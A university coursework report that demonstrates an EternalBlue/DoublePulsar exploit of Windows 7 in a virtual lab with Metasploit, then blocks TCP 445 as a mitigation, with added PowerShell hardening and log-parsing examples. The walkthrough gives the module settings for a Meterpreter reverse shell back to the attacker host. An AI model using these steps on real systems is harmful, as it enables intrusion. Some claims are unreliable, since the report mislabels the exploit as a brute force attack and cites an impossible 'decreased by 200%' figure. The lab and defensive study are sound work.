Rewanta Adhikari - CW2 Security in Computing.

Semester 2 coursework of Security In Computing for Computer Networking and IT Security Student for Islington College and London Met students.


CC5004NI Security in Computing

Module Code & Module Title: CC5004NI Security in Computing
Assessment Weightage & Type: 30% Individual Coursework 02
Year and Semester: 2021-22 Spring Semester
Student Name: Rewanta Adhikari
London Met ID: 20049258
College ID: NP01NT4S210055
Assignment Due Date: 5th May 2022
Assignment Submission Date: 5th May 2022
Word Count (Where required): 4135

I confirm that I understand my coursework needs to be submitted online via Google Classroom under the relevant
module page before the deadline for my assignment to be accepted and marked. I am fully aware that late
submissions will be treated as non-submission and a mark of zero will be awarded.

Acknowledgement
I had to enlist the assistance and counsel of a few well-respected individuals to complete the goals of this study, and they deserve my heartfelt appreciation. First and foremost, I'd like to express my gratitude to Islington College and London Metropolitan University for offering a conducive learning atmosphere and course materials. Mr. Akchayat Bikram Dhoj Joshi, my module leader, and Suruchi Shrestha, my tutor, deserve special thanks for their advice and continual monitoring, as well as their help in finishing this coursework. I'd like to thank my parents for their unwavering support, collaboration, and encouragement. My gratitude and thanks also go to my friends who have volunteered to assist me with their skills.

Abstract
In this document, we show how a brute force assault can be used to circumvent a system's login credentials and gain remote access to it. The presented attack uses Kali Linux as the attacker computer, the process "lsass.exe" as the process to inject into, and Meterpreter reverse TCP as the payload needed to exploit the MS17_010 vulnerability of the SMB port of Windows 7 64-bit. A brute force assault is the easiest method for hacking into a system and performing harmful operations. As a result, steps should be taken to protect the confidentiality, integrity and availability (the CIA triad) of the organization's data. Along with the demonstration of the attack, mitigation measures are discussed, as well as tips for avoiding such assaults. One of the most successful mitigation measures is to block TCP port 445 through the Windows firewall, and the process is described in detail. This mitigation technique is also evaluated, along with its benefits, drawbacks, and a cost-benefit analysis. This paper demonstrates how to compromise a system using Kali Linux's numerous tools and tactics, as well as how to prevent it.

Table of Contents
1) Introduction .............................................................................................................. 1

1.1 Current Scenario ................................................................................................ 2

1.2 Problem Statement ............................................................................................ 4

1.3 Aims and Objectives .......................................................................................... 5

2) Background .............................................................................................................. 6

2.1 Brute Force Attack ................................................................................................. 6

2.2 Server Message Block (SMB) Protocol .................................................................. 6

2.3 Eternal Blue ........................................................................................................... 7

2.4 DoublePulsar ......................................................................................................... 8

2.5 Pre-requirements and Tools .................................................................................. 9

2.6 Methodologies ..................................................................................................... 10

3) Demonstration ........................................................................................................ 11

3.1 Inserting Attacker’s machine in Network .............................................................. 11

3.2 Scanning Targeted Host’s ports........................................................................... 12

3.3 Searching for Module “MS17_010” ...................................................................... 12

3.4 Checking Likelihood of Vulnerability in Targeted Host ......................................... 13

3.5 Exploitation of MS17_010 Vulnerability ............................................................... 14

a) set PROCESSINJECT lsass.exe ....................................................... 15

b) set PAYLOAD windows/x64/meterpreter/reverse_tcp ........................................ 15

c) set RHOST 10.10.10.15 ..................................................................................... 15

d) set LHOST 10.10.10.254 ................................................................................... 15

e) set TARGETARCHITECTURE x64 .................................................................... 15

4) Mitigation................................................................................................................ 18

4.1 Updating Microsoft’s Security or Windows Defender ........................................... 18



4.2 Use of Long and Strong Passwords .................................................................... 18

4.3 Block SMBv1 Port ................................................................................................ 18

4.3.1 Process of Blocking SMBv1 Port ...................................................................... 18

4.3.2 Try to Exploit SMB of Windows Again after Mitigation ...................................... 23

i. Check Likelihood of Vulnerability in Targeted Host .......................................... 24

ii. Try to Compromise the Target ......................................................................... 24

5) Evaluation .............................................................................................................. 25

5.1 Pros of blocking port 445 ..................................................................................... 25

5.2 Cons of blocking port 445 .................................................................................... 25

5.3 Cost Benefit Analysis ........................................................................................... 25

6) Conclusion ............................................................................................................. 27

7) References............................................................................................................. 28

8) Appendix ................................................................................................................ 30

Table of Figures
Figure 1: Brute Force Attack .......................................................................................................1
Figure 2: Brute-Force attack stats (Hanna, 2022)........................................................................2
Figure 3: Brute-force computing time for password cracking (Cloudflare, 2022) ..........................3
Figure 4: New security modes in Windows by Microsoft (Weston, 2022) ....................................4
Figure 5: Working of SMB Protocol (Sheldon, 2022) ...................................................................7
Figure 6: EternalBlue ..................................................................................................................8
Figure 7: Inserting Attacker's machine in Network .....................................................................11
Figure 8: Scanning Targeted Host's ports .................................................................................12
Figure 9: Executing Metasploit Console in Kali Linux ................................................................12
Figure 10: Searching for module "smb login".............................................................................13
Figure 11: Using a module to Check .........................................................................................13
Figure 12: Command for module to check.................................................................................13
Figure 13: Checking likelihood of Vulnerability in targeted host .................................................14
Figure 14: Using a module for Exploitation ................................................................................14
Figure 15: Showing Options of Exploitation Module ..................................................................14
Figure 16: Setting Required Parameters ...................................................................................15
Figure 17: Exploit Successful ....................................................................................................16
Figure 18: Running "sysinfo" command.....................................................................................16
Figure 19: Running "getuid" command ......................................................................................17
Figure 20: Checking status of TCP port 445 ..............................................................................18
Figure 21: Opening Windows Firewall .......................................................................................19
Figure 22: Advanced Settings Criteria in Windows Firewall .......................................................20
Figure 23: Inbound Rules > New Rule .......................................................................................20
Figure 24: Entering 445 on Specific Local Port Option ..............................................................21
Figure 25: Choosing Port option ................................................................................................21
Figure 26: Block the connection > Next .....................................................................................22
Figure 27: Ticking all Checkboxes of Profile ..............................................................................22
Figure 28: Checking New Rule ..................................................................................................23
Figure 29: Checking the Likelihood of Vulnerability in Targeted Host ........................................24
Figure 30: Failure to Exploitation ...............................................................................................24

1) Introduction

A brute-force attack is a trial-and-error approach to decoding login credentials and encryption keys in order to use them to gain unauthorized access to systems. Rather than applying clever techniques, brute force is an exhaustive task. A basic brute-force assault often uses automated tools to guess all potential passwords until the correct input is discovered. For breaking popular passwords, this is an old but still efficient attack technique.

Figure 1: Brute Force Attack

Different types of brute-force attacks exist, such as the following:

• Credential stuffing: Credential stuffing happens when a user account is hacked, and
the attacker attempts the username and password combination on many platforms.
• Reverse brute-force attack: To get network and data access, a reverse brute-force
assault begins with the attacker using a common password – or already knowing a
password – against several usernames or encrypted files. To locate the proper
username, the hacker will apply the same method as a standard brute-force assault.

1
Rewanta Adhikari

• Dictionary attack: Another sort of brute-force assault is a dictionary attack, in which all words in a dictionary are tried in order to determine a password. To crack longer passwords, attackers might supplement words with numbers, letters, and other elements. (Hanna, 2022)

1.1 Current Scenario

The main benefit of brute force attacks is that they are relatively simple to execute and, given enough time and the absence of a mitigation technique on the target, they always work. A brute force assault may be used to attack any password-based system or encryption key. The length of time it takes to brute force into a system is a helpful statistic for judging the security of that system. A properly randomized password might take a brute force attacker days, months, or even years to crack if the target string is sufficiently long. Brute force assaults have become much more difficult because of the current trend towards longer passwords and encryption keys. When good passwords and encryption are used, attackers usually resort to alternative techniques, such as social engineering or on-path attacks.

Figure 2: Brute-Force attack stats (Hanna, 2022)


Brute force attacks succeed because they are the simplest approach given ample time and a lack of mitigating methods. According to the data, the number of sites hacked each day nearly doubled in 2016. In recent years, there has been steady growth in brute force attacks. In 2017, hacking attempts using brute force or dictionary attacks increased by 400%. In 2021, brute force attempts decreased by 200% as different forms of attack are now in use.

Figure 3: Brute-force computing time for password cracking (Cloudflare, 2022)
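The quantity Figure 3 illustrates, the worst-case time to exhaust a password's key space, can be reproduced for any password policy. The following is an added PowerShell example, not part of the coursework; the guess rate it uses is a constructed assumption, since real rates depend on the hash algorithm and the attacker's hardware.

```powershell
# Added example (not part of the coursework): estimate the exhaustive-search
# cost of several password policies at an assumed guessing rate.

function Get-BruteForceTime {
    param(
        [int]$CharsetSize,          # 26 lowercase, 62 alphanumeric, 95 printable ASCII
        [int]$Length,               # password length in characters
        [double]$GuessesPerSecond   # constructed assumption, see $rate below
    )
    $keySpace = [math]::Pow($CharsetSize, $Length)   # candidates an attacker must try
    $seconds  = $keySpace / $GuessesPerSecond         # exhaustive (worst-case) search

    # New-Object is used instead of [pscustomobject] so this also runs on
    # the PowerShell 2.0 that ships with Windows 7.
    New-Object PSObject -Property @{
        Policy  = "$Length chars from a set of $CharsetSize"
        Bits    = [math]::Round($Length * [math]::Log($CharsetSize, 2), 1)  # entropy
        Seconds = [math]::Round($seconds, 2)
        Years   = [math]::Round($seconds / 31536000, 4)
    }
}

# Constructed assumption: one billion guesses per second, a plausible rate
# for an offline attack against a fast, unsalted hash.
$rate = 1e9

$rows = foreach ($len in 6, 8, 10, 12) {
    foreach ($charset in 26, 62, 95) {
        Get-BruteForceTime -CharsetSize $charset -Length $len -GuessesPerSecond $rate
    }
}

# Each extra character multiplies the cost by the charset size, which is why
# length matters more than any single symbol class.
$rows | Format-Table Policy, Bits, Seconds, Years -AutoSize
```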


1.2 Problem Statement

Attacks such as ransomware can spread through the Windows SMB (Server Message Block) vulnerability and gain access to the machine. To prevent such attacks, Microsoft released a patch in March 2017. Even though the patch was released, many individuals and organizations still have not applied it. Because of these unpatched computers and users, the SMB exploit has remained an effective threat vector in visible ransomware outbreaks and complex Trojan campaigns. By 2021, the protections built into Windows, Azure, Microsoft 365, and Microsoft Defender for Office 365 will have prevented more than 9.6 billion malware threats, 35.7 billion phishing and other malicious emails, and 25.6 billion attempts to hijack our enterprise customers by brute-forcing stolen passwords, more than 800 password attacks per second. The intelligence we gain from this, along with the 8,500 security specialists we employ and the 24 trillion security signals processed by our cloud every 24 hours, provides us with a unique perspective on what our clients require to defend themselves from attacks both now and in the future. (Weston, 2022)

Figure 4: New security modes in Windows by Microsoft (Weston, 2022)


1.3 Aims and Objectives

The aim of this report is to demonstrate a simple example of a brute force attack, describe the process and critically analyse its mitigation strategies.

The objectives applied to achieve this aim are:

• To identify the current circumstances of brute-force attacks.
• To conduct a detailed background study.
• To demonstrate the attack and its mitigation practically.
• To critically evaluate the selected mitigation strategy with its pros, cons and CBA (Cost Benefit Analysis).


2) Background

In today's world, technological advancement has progressed to the point where password-protected systems have become an essential component of daily life. However, password cracking may be accomplished in a variety of ways. Password cracking is the technique of retrieving a password from data stored or transmitted by a system. It has both good and bad uses. A hacker may crack passwords for a variety of reasons, including gaining unauthorized access to someone's account or system, recovering a forgotten password, or exploiting a system's or enterprise's security to obtain confidential information. Various strategies and procedures, such as phishing, rainbow table attacks, dictionary attacks, brute force assaults, and so on, can be used for this purpose. Any of these approaches may be used by a third party. (Williams, 2022)

2.1 Brute Force Attack

A brute force attack is a type of hacking technique that relies on trial and error to crack
passwords, login credentials, and encryption keys. It is a simple yet dependable method
for getting illegal access to individual accounts as well as systems and networks of
companies. The hacker attempts a variety of usernames and passwords, frequently
using a computer to try many combinations, until they uncover the proper login
credentials. The term "brute force" refers to attackers who employ excessive force to
obtain access to user accounts. Despite being an ancient cyberattack strategy, brute
force assaults have been tried and proven and are still a common hacking tactic.
(Fortinet, 2022)

2.2 Server Message Block (SMB) Protocol

The Server Message Block protocol (SMB protocol) is a client-server communication protocol used to share access to network resources such as files, printers, serial ports, and other resources. It can also carry transaction protocols for interprocess communication. SMB has mostly been used to link Windows machines over the years, while most other systems, such as Linux and macOS, also provide client components for connecting to SMB resources.


Since Windows 95, Microsoft Windows operating systems (OSes) have incorporated
client and server SMB protocol capabilities. SMB functionality is also incorporated into
the Linux and macOS operating systems. Furthermore, Samba may be used on Unix-
based computers to simplify SMB access to file and print services. (Sheldon, 2022)

Figure 5: Working of SMB Protocol (Sheldon, 2022)

More information about the SMB protocol is given in the Appendix.

2.3 Eternal Blue

The US National Security Agency (NSA) developed EternalBlue, a Windows exploit that was utilized in the 2017 WannaCry ransomware outbreak. EternalBlue takes advantage of a flaw in Microsoft's implementation of the Server Message Block (SMB) protocol. This tricks a Windows PC that hasn't been patched against the vulnerability into permitting unauthorized data packets into the legitimate network. These data packets may include malware such as a trojan, ransomware, or other potentially harmful applications. EternalBlue was among the details revealed by the Shadow Brokers, a hacker gang that accessed an NSA cache of cyber weapons in 2017. EternalBlue was put on the internet by the Shadow Brokers, causing confusion and embarrassment for the NSA. Microsoft was notified and responded quickly by distributing a security fix for Windows sysadmins. Those whose computers were unpatched or who were running earlier versions of Windows were vulnerable to attack. At the time, the most popular Windows versions were 7 and 10; however, several major organizations continued to use Windows XP. Microsoft had already provided a fix for Windows 7 and 10 by the time of the WannaCry outbreak, which happened mere weeks after the exposure of the NSA hacking tools. The company then issued a fix for Windows XP, which was previously unsupported. (HYPR, 2022)

Figure 6: EternalBlue

2.4 DoublePulsar

DoublePulsar is a backdoor tool that is installed on a target system and has the capability of injecting and running malicious code on the machine. This allows an actor to escalate the assault by injecting any malicious code of their choice, ending in a total breach. The assault is exceedingly covert, with system administrators unlikely to discover the incursion unless the attackers make a mistake. As a result, many infected computers are likely to stay infected for some time before the intrusion is detected. (NHS Digital, 2022)

2.5 Pre-requirements and Tools

To accomplish this attack, a variety of Kali Linux tools were used, such as Metasploit and Nmap. For the victim machine, Windows 7 was chosen.

• VMware Workstation Pro: VMware is a virtualization and cloud computing software company headquartered in Palo Alto, California. VMware, which was founded in 1998, is a subsidiary of Dell Technologies. VMware was bought by EMC Corporation in 2004; EMC was eventually acquired by Dell Technologies in 2016. VMware's virtualization solutions are built upon its bare-metal hypervisor ESX/ESXi on the x86 architecture. (Bastiaansen, 2022) It was used to run the required virtual machines, i.e., Kali Linux (attacker) and a Windows 7 PC (victim).
• GNS3: Hundreds of thousands of network engineers throughout the world use
GNS3 to mimic, setup, test, and debug virtual and real networks. GNS3 enables
you to operate topologies ranging from a few devices on your laptop to numerous
devices hosted on several servers or even in the cloud. GNS3 is free and open-
source software (GNS3, 2022). GNS3 (Graphic Network Simulator-3) version
2.2.5 was used to create a LAN network topology using Cisco c3725 router and
Ethernet Switch. This tool allows us to build virtualized network laboratories with
variety of router, switches, and PCs.
• Kali Linux: Kali Linux is a customized Linux distribution for cybersecurity. It is an
open-source tool that allows for extensive customization for penetration testing,
allowing businesses to better understand their vulnerabilities. While many
experts recommend against Kali Linux for beginners, those who are interested in
cybersecurity often benefit from using this specific Linux distribution (Techopedia,
2022). Kali Linux is used as an attacker machine to execute an attack to exploit
SMB vulnerability of Windows 7 64-bit through Eternalblue.
• Nmap: Nmap (Network Mapper) is a free and open-source network discovery and security auditing tool. Many system and network administrators use it for activities like network inventory, service upgrade schedule management, and monitoring host or service uptime. Nmap employs novel techniques to detect what hosts are available on the network, what services (application name and version) those hosts provide, what operating systems (and OS versions) they are running, what sort of packet filters/firewalls are in use, and hundreds of other characteristics. (NMAP, 2022)
• Metasploit: The Metasploit Framework is an open-source, Ruby-based
framework used by information security experts and cybercriminals to locate,
exploit, and evaluate system vulnerabilities. H.D Moore created Metasploit in
2003 as a Perl-based portable network utility as part of the Metasploit Project.
The framework was completely redone in Ruby in 2007. The framework includes
a few exploitation and penetration testing tools. (Chipeta, 2022)

2.6 Methodologies

Firstly, Kali Linux (attacking machine) and Windows 7 (victim machine) were placed in a local network. The ping command was then used to confirm connectivity between the devices. The Metasploit console was started, and a search was made for available modules relating to MS17_010 or SMB vulnerabilities. A list of modules is returned, of which the "auxiliary/scanner/smb/smb_ms17_010" module is required to scan for and validate the presence of the SMB vulnerability on the targeted computer. To see what input has to be supplied, we execute the command "show options." We run it with the IP address of the targeted host as RHOSTS to test whether it is susceptible.

If the host is vulnerable to the attack, a positive message is shown, and following this verification, another module, "exploit/windows/smb/eternalblue_doublepulsar," is used for exploitation. Again, "show options" displays the input to be provided. We assigned the victim's IP address as RHOST, the listening host's IP address as LHOST, x64 as the target architecture, and windows/x64/meterpreter/reverse_tcp as the payload. With the exploit set up, we are ready to go. After typing the command "run" to exploit, a Meterpreter session is created in a few seconds, granting remote access to the targeted system.


3) Demonstration

This report demonstrates the use of EternalBlue and DoublePulsar to compromise a Windows 7 machine through Metasploit on a Kali Linux machine. The following steps were taken:

3.1 Inserting Attacker’s machine in Network

Figure 7: Inserting Attacker's machine in Network

To begin, the attacker system, Kali Linux, was placed in the network topology alongside
the targeted host, Windows 7, using Router and Core Switch. The IP address of
Windows 7-64 bit is 10.10.10.15/24, as shown in the picture, while the IP address of
Kali Linux is 10.10.10.254/24.


3.2 Scanning Targeted Host’s ports

The SMB protocol operates as an application-layer network protocol on port 445, largely used for providing shared access to serial ports, files, and other network assets. Because we want to attack the port 445 vulnerability, Nmap was used to determine whether the needed port of the targeted host is open or not.

Figure 8: Scanning Targeted Host's ports

3.3 Searching for Module “MS17_010”

Figure 9: Executing Metasploit Console in Kali Linux

As indicated in the illustration, the command "msfconsole" was first entered into the terminal of the Kali Linux machine. This command launches the Metasploit console from the "/usr/share/metasploit-framework/msfconsole" path, bypassing the start-up banner.


Following the execution of MSF console, a search for the string "smb login" was
performed, as shown in the preceding image. This search returns a list of all modules
that include the string "smb login," along with their name and description.

Figure 10: Searching for module "smb login"

3.4 Checking Likelihood of Vulnerability in Targeted Host

Figure 11: Using a module to Check

The "auxiliary/scanner/smb/smb_ms17_010" module was used to determine whether the targeted host is vulnerable. The command "show options" was then typed to display the options and their details, as seen in the picture above.

Figure 12: Command for module to check



Figure 13: Checking likelihood of Vulnerability in targeted host

The RHOSTS option was set to the IP address of the targeted host, as indicated in the figure. The syntax is "set RHOSTS <IP address>". Because the IP address of the targeted host, Windows 7, is 10.10.10.15, the command entered was "set RHOSTS 10.10.10.15".

Then, we hit “run” command to execute the program. After execution, we can see that
Windows 7 Home Premium 7601 Service Pack 1 x64 (64-bit) is likely vulnerable to
MS17_010.

3.5 Exploitation of MS17_010 Vulnerability

Figure 14: Using a module for Exploitation

After confirming the potential for exploitation, the module "exploit/windows/smb/eternalblue_doublepulsar" was employed. This module is used to attack the MS17_010 vulnerability in Windows 7 64-bit and install a persistent backdoor.

Figure 15: Showing Options of Exploitation Module


After entering the exploit module, the "show options" command was issued, which shows the options together with their current values, as seen in the picture above. The PROCESSINJECT option was initially set to "explorer.exe."

Figure 16: Setting Required Parameters

As shown in above figure, different parameters were set:

a) set PROCESSINJECT lsass.exe

This command specifies "lsass.exe" (Local Security Authority Subsystem Service) as the process into which the payload will be injected. Injecting into the "lsass.exe" process allows the exploit to run code on the Windows host remotely with no user intervention.

b) set PAYLOAD windows/x64/meterpreter/reverse_tcp

This command selects the Meterpreter reverse_tcp as the payload.

c) set RHOST 10.10.10.15

This command sets the IP address of target host.

d) set LHOST 10.10.10.254

This command sets the IP address of listening host.

e) set TARGETARCHITECTURE x64

This command sets the x64 architecture for the target host. By default it is set to x86.


Figure 17: Exploit Successful

After setting all the parameters, “exploit” command was inserted which executes the
process of exploitation. In the above figure, we can see that MS17_010 vulnerability of
Windows OS was successfully exploited and meterpreter session 1 is opened. This
illustrates a successful control over the system.

Figure 18: Running "sysinfo" command

Following the setup of a session, several instructions can be input to compromise the
system.


The command "sysinfo" revealed system information in this case, as seen in the image
above. Furthermore, the number of logged in users is two, indicating an existing
legitimate user and the attacker.

Figure 19: Running "getuid" command

The Meterpreter user on the target was displayed using the command "getuid."
Similarly, on the infected target, other commands may be used to inject malware,
launch new programs, stop running processes, access all data, and so on. The
command "ps" is used to view the target's processes.

This confirms that the attack succeeded.


4) Mitigation

4.1 Updating Microsoft’s Security or Windows Defender

As previously stated, Microsoft has provided the MS17_010 patch to prevent such attacks. As a result, installing this fix, as well as the other updates Microsoft published in March 2017, prevents exploitation of the MS17_010 vulnerability. The newer Windows 11 also uses different security mechanisms for protection, and most of these vulnerabilities and loopholes have been closed.

4.2 Use of Long and Strong Passwords

Use long and complex passwords that include lowercase and uppercase letters, numbers, symbols and other special characters. Also enforce periodic password changes.

4.3 Block SMBv1 Port

Most SMB data is sent over TCP port 445, so leaving this port open exposes the Windows OS. Restricting TCP port 445 may therefore be the most effective way to mitigate the SMB vulnerability and prevent remote code execution.

4.3.1 Process of Blocking SMBv1 Port

Following steps were taken for the blocking of SMBv1 Port:

i. Check the status of port 445.

Figure 20: Checking status of TCP port 445


Port 445 is normally opened by the system on Windows, but it is important to check it
on the host. We did this by typing "netstat -na" into the target machine's command line.
As the figure above shows, the command lists the machine's ports along with their
status. On line 2 we can see port 445 with the status "LISTENING". This indicates that
the TCP port is open and not blocked.

ii. Go to Start > Control Panel > Windows Firewall and then Advanced settings.

Figure 21: Opening Windows Firewall

After confirming that TCP port 445 was open, the Windows OS control panel was
launched, and System and Security was selected. We selected Windows Firewall from
the "System and Security" menu.


Figure 22: Advanced Settings Criteria in Windows Firewall

As indicated in the figure above, the option "Advanced settings" was selected inside the
Windows Firewall section. Before creating a rule, confirm that the Windows Firewall is
turned on for every profile; a block rule on a disabled profile has no effect.

iii. Click Inbound Rules > New rule, choosing Port > Next > TCP > Specific local
ports on pop-up window and type 445 and press Next Button.

Figure 23: Inbound Rules > New Rule


Figure 25: Choosing Port option

Within the "Advanced Settings" section, "Inbound Rules" was selected, followed by
"New Rule." A new rule was created to block incoming connections on TCP port 445. We
selected "Port" as the rule type and, under "Specific local ports", entered the port to
which connections should be blocked.

Figure 24: Entering 445 on Specific Local Port Option


iv. Click Block the connection > Next and tick all the check boxes and press on
Next.

Figure 26: Block the connection > Next

Then the "Block the connection" radio button was selected. This option blocks
connections to the port specified earlier. The Next button was clicked, as shown in the
figure.

Figure 27: Ticking all Checkboxes of Profile


Then, as seen in the image, three profiles (Domain, Private and Public) were shown as
checkboxes. All three were selected, since the port must be closed whichever network
the machine is connected to. The Next button was pressed. Following that, a name and
description for the new rule were requested. The rule was named "Blocking port 445",
and a brief explanation of why it was created was entered as the description.

v. Check if the rule is created by Properties > Protocols and Ports > Local Port.

Figure 28: Checking New Rule

Following these steps, a new rule entitled "Blocking port 445" appeared under "Inbound
Rules." The rule was verified by opening its properties and confirming that Protocols
and Ports shows TCP with local port 445. This was the final step in blocking TCP port
445.
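The same five steps can be scripted. The following PowerShell is an added example and not part of the original coursework; it assumes an elevated prompt on the Windows target and uses netsh and the registry rather than the newer NetSecurity and SmbShare cmdlets so that it also runs on Windows 7, the generation of Windows most often hit by MS17-010. The rule name is the one used in the GUI walkthrough above; the 139 rule and the SMBv1 registry change are additions beyond what the screenshots show.

```powershell
# Added example (not from the original coursework): scripted equivalent of the
# GUI steps i-v above. Run from an elevated PowerShell prompt on the target host.

$RuleName = "Blocking port 445"   # same name the report gives the GUI rule

# Step i: is anything listening on TCP 445 before we change anything?
Write-Host "== TCP 445 listeners before the change =="
netstat -ano | Where-Object { $_ -match ':445\s+.*LISTENING' }

# The firewall must be on for every profile, otherwise a Block rule does nothing.
netsh advfirewall set allprofiles state on | Out-Null

# Steps ii-iv: inbound block rule for TCP 445 on Domain, Private and Public.
# Re-running the script would otherwise add a duplicate, so drop any old copy first.
netsh advfirewall firewall delete rule name="$RuleName" | Out-Null
netsh advfirewall firewall add rule name="$RuleName" dir=in action=block `
    protocol=TCP localport=445 profile=any `
    description="Blocks inbound SMB (MS17-010 mitigation)" | Out-Null

# SMB can also ride the NetBIOS session service, so close TCP 139 as well.
netsh advfirewall firewall delete rule name="$RuleName (NetBIOS 139)" | Out-Null
netsh advfirewall firewall add rule name="$RuleName (NetBIOS 139)" dir=in action=block `
    protocol=TCP localport=139 profile=any | Out-Null

# Step v: confirm the rule exists and carries LocalPort 445.
Write-Host "== Rule as stored by the firewall =="
netsh advfirewall firewall show rule name="$RuleName"

# Belt and braces: turn off the SMBv1 server dialect that MS17-010 affects.
# This is the registry method Microsoft documents for Windows 7 / Server 2008 R2;
# on Windows 8.1 and later, Set-SmbServerConfiguration -EnableSMB1Protocol $false
# does the same job.
$LanmanKey = "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
Set-ItemProperty -Path $LanmanKey -Name SMB1 -Type DWORD -Value 0 -Force
Write-Host "SMB1 registry value now:" (Get-ItemProperty -Path $LanmanKey).SMB1
Write-Host "Reboot (or restart the LanmanServer service) for the SMBv1 change to apply."
```

The rule is inbound only, so the host can still reach file servers and domain controllers as an SMB client; what stops working is anyone connecting to this host's shares, as section 5.2 notes.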

4.3.2 Try to Exploit SMB of Windows Again after Mitigation

After applying the mitigation, the procedure for exploiting the MS17-010 vulnerability
in the Windows SMB service was carried out again to check whether the mitigation had
worked.

Again, the steps for exploitation were followed:


i. Check Likelihood of Vulnerability in Targeted Host

Figure 29: Checking the Likelihood of Vulnerability in Targeted Host

Again, the "auxiliary/scanner/smb/smb_ms17_010" module was used to determine whether
the targeted host is susceptible. The target's IP address was set in RHOSTS and the
module was run. Unlike the earlier run, the scanner no longer reported that the target
is likely vulnerable, because it could not reach the SMB service at all.

ii. Try to Compromise the Target

When we attempted to compromise the target again, the exploit module returned an error
indicating that TCP port 445 could not be reached: the packets sent to port 445 were
dropped by the firewall, so the attack could not proceed. The mitigation applied on the
Windows host was therefore effective.

Figure 30: Exploitation failing after mitigation
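The attacker's error message is one side of the evidence; the defender can confirm the same block from the Windows host by enabling logging of dropped packets and reading the firewall log. The PowerShell below is an added example, not part of the original coursework. It assumes PowerShell 3.0 or later and the standard pfirewall.log field layout; the log lines embedded in it are constructed for offline testing (RFC 5737 documentation addresses, 192.0.2.10 as the attacker and 192.0.2.20 as the target) and are not captured from the lab.

```powershell
# Added example (not from the original coursework): find inbound SMB attempts
# that the new rule dropped. Enable drop logging first (elevated prompt):
#   netsh advfirewall set allprofiles logging droppedconnections enable
# The log is then written to $env:SystemRoot\System32\LogFiles\Firewall\pfirewall.log.

function Get-Smb445Drops {
    param([string[]]$Lines)
    $fields = $null
    foreach ($line in $Lines) {
        # The "#Fields:" header names the columns; use it rather than fixed offsets.
        if ($line -like '#Fields:*') {
            $fields = ($line -replace '^#Fields:\s*', '') -split '\s+'
            continue
        }
        if ($line -like '#*' -or -not $fields -or [string]::IsNullOrWhiteSpace($line)) { continue }
        $vals = $line -split '\s+'
        $rec = @{}
        for ($i = 0; $i -lt $fields.Count -and $i -lt $vals.Count; $i++) {
            $rec[$fields[$i]] = $vals[$i]
        }
        # Only inbound (RECEIVE) TCP packets to 445 that the firewall dropped.
        if ($rec['action'] -eq 'DROP' -and $rec['protocol'] -eq 'TCP' -and
            $rec['dst-port'] -eq '445' -and $rec['path'] -eq 'RECEIVE') {
            [pscustomobject]@{
                Time    = "$($rec['date']) $($rec['time'])"
                Source  = $rec['src-ip']
                SrcPort = $rec['src-port']
                Flags   = $rec['tcpflags']   # "S" = a bare SYN, i.e. a connection attempt
            }
        }
    }
}

# Constructed sample log (not a real capture) in pfirewall.log format.
$sample = @'
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2022-05-05 10:12:01 DROP TCP 192.0.2.10 192.0.2.20 41532 445 52 S 1234567 0 8192 - - - RECEIVE
2022-05-05 10:12:01 DROP TCP 192.0.2.10 192.0.2.20 41533 445 52 S 1234568 0 8192 - - - RECEIVE
2022-05-05 10:12:03 ALLOW TCP 192.0.2.20 192.0.2.5 49700 445 0 - 0 0 0 - - - SEND
2022-05-05 10:12:04 DROP UDP 192.0.2.10 192.0.2.20 51000 137 78 - - - - - - - RECEIVE
'@ -split "`r?`n"

$drops = @(Get-Smb445Drops -Lines $sample)
$drops | Format-Table -AutoSize
Write-Host ("{0} inbound SMB connection attempt(s) dropped, from: {1}" -f
    $drops.Count, (($drops.Source | Sort-Object -Unique) -join ', '))

# Against the real log on the target:
#   Get-Smb445Drops -Lines (Get-Content "$env:SystemRoot\System32\LogFiles\Firewall\pfirewall.log")
```

The filter keeps only dropped inbound TCP packets to 445, so the host's own outbound SMB connection to a file server (the ALLOW/SEND line) and unrelated NetBIOS name-service noise on UDP 137 are not reported. A burst of bare-SYN drops from one source, as in the sample, is exactly what a Metasploit scan or exploit attempt looks like after the rule is in place.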


5) Evaluation

The Windows vulnerability MS17-010 can be exploited with little effort to gain remote
access to an unpatched host. The attack can be stopped by blocking all inbound TCP port
445 connections; applying the MS17-010 update remains the proper fix, and the port
block is a compensating control. Leaving this port exposed opens the Windows host to a
variety of malicious activity, including trojans and worms that spread over SMB.
Blocking the port, however, has both advantages and disadvantages.
5.1 Pros of blocking port 445

a. The Windows host is protected from trojans and worms that propagate over SMB.
b. Ransomware that spreads through TCP port 445 (WannaCry being the best-known case)
   cannot reach the host.
c. It is essentially a zero-cost mitigation, needing only a firewall rule.

5.2 Cons of blocking port 445

a. SMB-based services offered by the host, such as file and printer sharing, the
   administrative shares used for remote Windows administration, shared serial ports
   and other resources reached over named pipes, will no longer be available to other
   machines.

5.3 Cost Benefit Analysis

To illustrate the cost-benefit analysis, consider a hypothetical corporation whose
systems' SMB vulnerability was exploited and which, after discovering the breach,
implemented the same mitigation described in this report. After finding that its
systems had been accessed remotely by an unknown third party, the organization decided
to put an effective mitigation in place. Its annual loss expectancy as a result of this
attack was $310,000. IT personnel were engaged to address the issue; after a
vulnerability assessment they identified the flaw in the company's Windows systems. To
deploy the mitigation, they created a new inbound rule in the Windows firewall that
discards packets arriving at TCP port 445.

Now, as we know,

Cost Benefit Analysis (CBA) = Annualized Loss Expectancy (prior) - Annualized Loss
Expectancy (post) - Annualized Cost of the Safeguard (ACS)

i.e.,

CBA = ALE (prior) - ALE (post) - ACS
    = $310,000 - $180,000 - $500
    = $129,500

Because the reduction in annualized loss expectancy ($310,000 - $180,000 = $130,000)
is far larger than the annualized cost of the safeguard ($500), the CBA is positive and
the firewall rule is a cost-effective countermeasure. The ALE figures are assumptions
of this hypothetical scenario rather than measured values.


6) Conclusion

The report demonstrated an attack that bypasses the system's login credentials entirely
and grants remote access to the target. It focused on the MS17-010 vulnerability in the
Windows SMB protocol and its exploitation; unlike a brute force attack, this exploit
needs no credentials at all.

The vulnerability was exploited from a Kali Linux machine using Nmap and Metasploit
modules, each of which needs its own options set. The study shows how EternalBlue is
used to bypass authentication and obtain remote access, and how DoublePulsar plants a
backdoor for persistence. To mitigate the issue, the Microsoft MS17-010 update should be
applied; failing that, an inbound firewall rule blocking traffic to TCP port 445 stops
remote exploitation.

To compile this study, extensive research was conducted, several websites were
visited, and journals were studied. Failures encountered along the way were worked
